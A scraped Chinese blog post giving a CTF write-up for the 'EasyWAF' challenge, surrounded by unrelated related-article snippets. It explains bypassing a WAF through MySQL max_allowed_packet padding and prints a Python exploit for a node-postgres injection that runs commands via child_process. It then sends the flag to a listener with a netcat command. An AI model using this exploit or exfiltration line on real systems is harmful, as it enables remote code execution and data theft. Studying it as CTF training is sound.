EasyWAF

最新推荐文章于 2025-06-22 15:58:04 发布
最新推荐文章于 2025-06-22 15:58:04 发布
阅读量169 收藏 2
点赞数 2
CC 4.0 BY-SA版权
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/asdfaa/article/details/125938355

EasyWAF

访问首页“/”时,发现cookie为node=dGhlcmUgaXMgbm90aGluZ34h,base64解码后结果为“there is nothing~!”。

uploading.4e448015.gif正在上传…重新上传取消

访问接口“/register”时,尝试进行注入,会提示“SQL Injection Attack Found! IP record!”。

正常访问接口“/register”时,返回结果为“IP have recorded!”,同时,发现设置了Cookie为node=bWF4X2FsbG93ZWRfcGFja2V0,base64解码后结果“max_allowed_packet”。

访问“/hint”时,发现cookie为node=fiBub2RlLXBvc3RncmVzIH4h,base64解码后结果为“~ node-postgres ~!”。

进一步进行注入探测,可以知道,过滤了以下字符串:

    "select", 
    "union", 
    "and", 
    "or", 
    "\\", 
    "/", 
    "*", 
    " "

结合以上两点信息,可以知道此web服务使用nodejs,并且waf数据保存在mysql中,而注册数据保存在postgresql中,同时可以利用mysql的max_allowed_packet特性绕过waf,并结合nodejs postgres包的RCE漏洞进行利用,给出如下exp.py。

from random import randint
import requests
import sys

payload = "union"

def exp(url, cmd):
print(cmd)
payload = “”"’,’’)/%s/returning(1)as"\’/",(1)as"\’/-(a=child_process)/",(2)as"\’/-(b=%s)/",(3)as"\’/-console.log(process.mainModule.require(a).exec(b))]=1//"–""" % (’ ’ * 1024 * 1024 * 16, cmd)
username = str(randint(1, 65535)) + str(randint(1, 65535)) + str(randint(1, 65535))

data = { 'username': username + payload,'password': 'ABCDEF'}
print('ok')
r = requests.post(url, data = data)
print(r.content)

if name == ‘main’:
exp(sys.argv[1], sys.argv[2])

执行“python3 exp.py http://ip:端口/register “cat flag.txt|nc ip 端口””,如下。

远程服务器监听9999端口,获得flag。

使用Easywaf防御WEB攻击
whoami
09-30 396
Easywaf是开源的WEB应用防火墙,基于openresty开发,可以保护WEB应用或API接口,阻断常见的web攻击。同时Easywaf提供友好的后台管控界面,支持IP、URL、Referer、User-Agent等HTTP常见字段的自定义访问规则。
NSSCTF-WEB-easy_eval
m0_52061428的博客
10-16 1494
说是easy,实际很difficult。
WAF渗透攻防实践(16)
yyj1781572的博客
02-25 875
通过该实验了解基于规则的WAF的工作原理,通过分析相关防御规则,尝试使用多种方法进行绕过,使读者直观感受攻防双方的博弈过程。
BUUCTF WEB EasyCalc
qq_41696858的博客
08-22 253
这题考的是waf的绕过,打开页面,发现是一个命令执行的页面,查看源码,发现通过js发了一个ajax请求 有注释,在中间加了waf 这题的主要的点也就在这里,有两者绕过姿势,1.在num之前加一个空格,这样在waf程序里匹配到的就是空格+num参数,而不是num参数,就可以绕过waf,把请求传到后端 服务器calc.php页面,盲猜waf是先get了num参数,才去做过滤等一系列参数的 那么请求到了calc.php页面进行了二次过滤 <?php error_reporting(0); if(!isset
ZJUCTF2024(我的WP)
m0_52061428的博客
11-11 1040
本篇文章展示我在近几日在ZJUCTF中(初赛+决赛)所解出的题目以供各位师傅学习参考,也欢迎各位师傅在评论区私信交流。
2021深育杯线上初赛官方WriteUp
热门推荐
further_eye的博客
11-18 1万+
Web EasySQL 访问robots.txt,可得三个文件index.php、config.php、helpyou2findflag.php。 fuzz黑名单,可发现select、单双引号、括号、分号、set、show、variables、等都没有过滤。 经测试可得到闭合方式为括号,且白名单为数据库记录行数,使用1);{sqlinject}-- +可以闭合查询语句并进行堆叠注入。 show variables like '%slow_query_log%'; # 查询慢日志记录是否开启 setgloba
RADIUS认证服务器全面解析:核心功能、应用场景
www.andang.cn
06-22 389
在APT攻击常态化、数据泄露高频化的时代,RADIUS认证服务器已从网络配件升级为战略级安全基础设施。安全效能跃迁:认证风险响应速度从小时级提升至秒级合规成本优化:等保/GDPR合规准备时间缩短60%业务连续性保障:实现99.99%服务可用性。
U盾服务器远程点按OK键,破解千盾管理困局
复园科技的博客
06-19 863
在国资委“司库建设”大潮与财务共享中心普及的当下,大型企业资金组正面临海量U盾管理的世纪难题:数百枚U盾分散难管、人工插拔效率低下、RPA自动化遇阻,更别提那些必须“亲手按一下”的二代U盾了!告别U盾“人肉快递”,解锁RPA全流程自动化,让资金管控更安全、更可视、更高效——这,就是智能时代U盾管理的标准答案。RPA脚本可自动申请U盾使用权、登录网银、执行任务(如下载流水)、触发OK键确认、释放设备,全程无人干预。(1)成百上千枚U盾,统一插入高密度U盾服务器,集中存放于企业机房机柜,物理安全有保障。
服务器与物理服务器对比:选择最适合的业务服务器解决方案
Clownseven的博客
06-20 526
全面对比云服务器与物理服务器的优缺点,帮助你根据业务需求选择最佳服务器类型,提升性能与成本效益。
搭建Node.js服务器
zbl1340301274的博客
06-16 309
本文介绍了使用Node.js构建HTTP服务器的四个核心功能实现:1)基础HTTP服务器搭建,包含路由和错误处理;2)静态资源服务器开发,支持异步文件操作、自动索引和内容类型检测;3)GET请求处理,通过URL模块解析查询参数;4)POST请求处理,采用流式方式接收并解析表单数据。每个功能模块都提供了完整代码示例,包含端口监听、请求响应处理和错误捕获等关键实现。通过四个独立运行的示例,展示了从基本服务器到表单参数处理的完整开发流程,代码均配有详细注释便于理解。
Linux——5.文件处理基础命令
weixin_66370632的博客
06-20 315
Linux常用命令速查指南 本文汇总了Linux系统中文件和目录管理的基础命令,包含六大类常用操作:1)目录列表命令(ls/tree/find);2)文件处理命令(创建/复制/移动/删除);3)目录操作命令;4)文件查看命令(cat/less/grep等);5)高级技巧(文件比较/统计/批量操作);6)常用快捷键。文章以简明格式呈现命令及参数,突出实用性,可作为Linux初学者快速查询的参考手册,覆盖日常文件管理、权限设置、内容查看等高频操作需求。
QC -io 服务器排查报错方式/报错: Failed to convert string to integer of varId variable!“
weixin_45958839的博客
06-21 114
1.编辑 -> 2.Find/Replace ->3.Advanced Find ->4. Project“xxxxx” 能找到问题点。进断点控制台有报错之后,复制报错信息到 头部菜单栏。
fastmcp MCPConfig多服务器使用案例;sse、stdio、streamable-http使用
weixin_42357472的博客
06-19 268
摘要:本文展示了如何使用fastmcp库的Client类配置和调用多服务工具。示例代码演示了同时配置"trip"和"math"两个服务,分别通过HTTP和命令行启动。通过call_tool方法调用不同前缀的服务工具(如"trip_check_hotel"和"math_add"),并处理返回结果。当配置多个服务时需要添加前缀区分,而单服务配置则可直接调用工具函数名。代码采用异步上下文管理器确保资源正确释放。
服务器手动安装并编译R环境库包:PROJ→RGDAL
WW、forever的博客
06-20 806
服务器手动安装并编译R环境库包:PROJ→RGDAL
Linux下nginx访问路径页面
weixin_62037667的博客
06-20 279
我这里创建了一个html文件夹 在进入去创建页面并且重新加载。第一步:通过Xshell在虚拟机中下载nginx。第二步:进入nginx配置页面。第三步配置 conf.d。
远程登录与数据同步企业级实战模拟案例
Wezzer的博客
06-20 299
1、远程免密登录2、数据实时同步。
常见 Web 服务器
刘皇叔说Java的博客
06-19 529
静态网站推荐Nginx,Java 项目推荐Tomcat,微服务推荐Spring Boot + 内嵌 Jetty/Undertow,企业级项目可选WildFly或GlassFish。
OJ搭建:Judge0服务器、DeepSeek服务接入简介
最新发布
zcsor的专栏
06-22 336
我用的OJ是轮询式的,所以只需要从ECS的后台检查一下数据库的内容而后参考OJ的评测机代码和守护进程(C语言)就可以知道它是怎么实现的评测。所以,我们的评测机比原OJ的阻塞式的本地评测机要复杂一些,这里面有一些生产——消费模型需要实现,但它能够承受更大的负载也不会由于对某些代码的评测导致出错从而使大面积的评测陷入长时间的等待。0、找一个云服务商,我用的是阿里云,你要根据你所在地区来租用服务器,本省、隔壁省可能都行,太远的就很容易呵呵掉,别问我咋知道的,一问一个不吱声。作为一个记录,也给有想法的一点参考。
ComfyUI遭“Pickai“C++后门攻击,全球700余台AI图像生成服务器沦陷
FreeBuf_的博客
06-20 280
ComfyUI遭Pickai后门攻击,全球700台AI服务器沦陷。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值